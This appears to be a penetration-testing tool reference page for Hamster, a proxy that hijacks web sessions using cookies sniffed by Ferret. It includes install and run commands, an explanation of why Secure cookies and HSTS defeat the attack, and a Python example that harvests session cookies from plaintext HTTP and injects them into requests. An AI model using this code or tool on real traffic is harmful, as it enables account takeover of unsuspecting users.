Category: Sniffing & Spoofing. Tags: sidejacking, proxy, session-hijacking, cookies

Hamster Sidejack

Hamster is a sidejacking tool that acts as a proxy server, replacing your cookies with stolen session cookies to hijack others' sessions. Cookies are sniffed using the Ferret program.

Description

Hamster-sidejack is a specialized tool for session hijacking, known as 'sidejacking'. It functions as a proxy server that intercepts and swaps session cookies, enabling attackers to impersonate users by taking over their active web sessions. This tool is particularly useful in scenarios where an attacker has access to network traffic containing unencrypted cookies, such as on open Wi-Fi networks.

The primary use case involves combining Hamster with cookie-sniffing tools like Ferret to capture session tokens from victims. Once obtained, Hamster's proxy capability allows seamless takeover of the victim's authenticated sessions without needing their credentials. The technique bypasses the login entirely for sites that let the browser send the session cookie over plaintext HTTP, which is the case when the cookie lacks the Secure attribute or the site is not HTTPS-only. HttpOnly offers no protection here: it only hides the cookie from script, and the cookie still crosses the network in the clear.

Hamster requires Ferret for the sniffing component, making it part of a broader toolkit for man-in-the-middle attacks. It is lightweight, with an installed size of 154 KB, and is available in Kali Linux repositories for easy deployment in penetration testing environments.

How It Works

Hamster operates as a proxy server listening on a specified port, such as 127.0.0.1:1234. Users configure their browser to route traffic through this proxy. The tool replaces the browser's cookies with session cookies previously stolen via Ferret, which sniffs network traffic for unencrypted cookie data. Internally, it initializes listening ports, manages proxy threads, and performs cookie substitution during HTTP requests, enabling transparent session hijacking over plaintext HTTP. Cookies that only ever travel inside TLS (Secure-flagged cookies on an HTTPS-only site, typically enforced with HSTS) never reach Ferret, so Hamster has nothing to substitute for those sites.
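The pipeline just described, reduced to its two halves, as an added example rather than code from hamster or ferret: harvest_cookies() plays the Ferret role (collect every cookie seen in sniffed plaintext HTTP, per host), sidejack_request() plays the Hamster proxy role (swap the browser's Cookie header for the stolen one before forwarding), and sidejackable() is the defender's check from the Description of whether a Set-Cookie is exposed to this attack at all. The captured traffic, host names, cookie names and function names are constructed for the example.

```python
# Added example, not code from hamster or ferret: a minimal model of the
# sidejacking pipeline. harvest_cookies() plays the Ferret role (collect
# cookies from sniffed plaintext HTTP), sidejack_request() plays the Hamster
# proxy role (swap the browser's cookies for the stolen ones), and
# sidejackable() is the defender's check for the Secure attribute.
# Hosts, cookie names and the captured traffic are constructed sample data.
from http.cookies import SimpleCookie
from typing import Dict, List, Tuple

# Constructed capture: (host, raw HTTP message) pairs. A sniffer knows the
# host from the TCP flow even for responses, which carry no Host header.
CAPTURED_HTTP: List[Tuple[str, bytes]] = [
    ("webmail.example",
     b"GET /inbox HTTP/1.1\r\n"
     b"Host: webmail.example\r\n"
     b"Cookie: SESSIONID=victim-7f3a; theme=dark\r\n"
     b"\r\n"),
    ("webmail.example",
     b"HTTP/1.1 200 OK\r\n"
     b"Set-Cookie: tracking=abc123; Path=/\r\n"
     b"Set-Cookie: SESSIONID=victim-7f3a; Path=/; HttpOnly\r\n"
     b"Content-Length: 0\r\n"
     b"\r\n"),
]

CookieJar = Dict[str, Dict[str, str]]   # host -> {cookie name: value}


def _split(raw: bytes) -> Tuple[str, List[Tuple[str, str]], bytes]:
    """Split a raw HTTP message into (start line, [(name, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def harvest_cookies(flows: List[Tuple[str, bytes]]) -> CookieJar:
    """Ferret role: every Cookie and Set-Cookie seen in the clear, per host.
    Set-Cookie attributes (Path, HttpOnly, ...) are parsed and discarded;
    only the name=value pair matters for replay."""
    jar: CookieJar = {}
    for host, raw in flows:
        _, headers, _ = _split(raw)
        for name, value in headers:
            if name.lower() not in ("cookie", "set-cookie"):
                continue
            parsed = SimpleCookie()
            parsed.load(value)
            for key, morsel in parsed.items():
                jar.setdefault(host, {})[key] = morsel.value
    return jar


def sidejack_request(raw_request: bytes, jar: CookieJar) -> bytes:
    """Hamster role: rewrite one browser request so it carries the victim's
    cookies for the target host. Requests for hosts with nothing stolen pass
    through untouched, as a proxy must."""
    start, headers, body = _split(raw_request)
    host = next((v for n, v in headers if n.lower() == "host"), None)
    stolen = jar.get(host or "")
    if not stolen:
        return raw_request
    kept = [(n, v) for n, v in headers if n.lower() != "cookie"]
    kept.append(("Cookie", "; ".join(f"{k}={v}" for k, v in stolen.items())))
    head = "\r\n".join([start] + [f"{n}: {v}" for n, v in kept])
    return head.encode("latin-1") + b"\r\n\r\n" + body


def sidejackable(set_cookie: str) -> bool:
    """Defender's check: a cookie set without Secure will also be sent over
    plaintext HTTP, so a sniffer on the path can take it. HttpOnly does not
    help; it only hides the cookie from script, not from the wire."""
    parsed = SimpleCookie()
    parsed.load(set_cookie)
    return any(not morsel["secure"] for morsel in parsed.values())


if __name__ == "__main__":
    jar = harvest_cookies(CAPTURED_HTTP)
    print("harvested:", jar)
    mine = (b"GET /inbox HTTP/1.1\r\nHost: webmail.example\r\n"
            b"Cookie: SESSIONID=mine-0001\r\n\r\n")
    print(sidejack_request(mine, jar).decode("latin-1"))
```

The real Hamster does the substitution inside a browser-facing HTTP proxy with its own listener and threads; the example keeps it as a pure function over the request bytes so the cookie swap itself is visible. Note that sidejackable() says nothing about a cookie a site only ever sets and sends over HTTPS with HSTS in place: such a cookie never appears on the wire in the clear and is outside what Ferret can capture.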

Installation

```bash
sudo apt install hamster-sidejack
```

Examples

Starts the Hamster sidejacking proxy on 127.0.0.1:1234. It prints the HAMPSTER 2.0 banner, instructs you to set the browser proxy to http://127.0.0.1:1234 for cookie replacement, reports the port setting and mg_open_listening_port in its debug output, and begins the proxy thread once the port is bound.
hamster
Sets the browser to use the proxy http://127.0.0.1:1234 before running hamster, so that stolen cookies are substituted into the browser's requests.
set browser to use proxy http://127.0.0.1:1234; hamster
Installs the tool and runs it to start the sidejacking proxy server.
sudo apt install hamster-sidejack; hamster
Updated 2026-04-16 (source: kali.org)